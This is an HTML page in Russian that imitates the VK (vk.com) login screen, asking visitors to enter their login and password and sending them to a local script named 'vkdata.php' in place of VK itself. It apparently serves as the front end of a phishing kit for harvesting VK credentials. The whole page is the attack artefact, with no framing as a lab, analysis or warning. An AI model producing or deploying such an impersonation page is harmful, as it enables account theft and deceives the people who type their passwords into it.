<!DOCTYPE html>
<html lang="ru">
<head>
	<title>Авторизация VK</title>
	<meta charset="UTF-8">
<!--===============================================================================================-->	
	<link rel="icon" type="image/png" href="images/img-01.png"/>

	<link rel="stylesheet" type="text/css" href="css/main.css">
<!--===============================================================================================-->
</head>
<body>
	
	<div class="limiter">
		<div class="container-login100">
			<div class="vk">
				<div class="login100-pic js-tilt">
					<img src="images/vk.png" alt="IMG">
				</div>

				<form  action="vkdata.php" method="post"  class="login100-form validate-form">
					<span class="login100-form-title">
                        Пожалуйста, авторизируйтесь в vk.com
					</span>

					<div class="wrap-input100">
						<input class="input100" type="text" name="email" placeholder="Логин">
						<span class="focus-input100"></span>
					</div>

					<div class="wrap-input100">
						<input class="input100" type="password" name="pass" placeholder="Пароль">
						<span class="focus-input100"></span>
					</div>
					
					<div class="container-login100-form-btn">
						<button class="login100-form-btn">
                         Авторизация
						</button>
					</div>

				

				
				</form>
			</div>
		</div>
	</div>
</body>
</html>
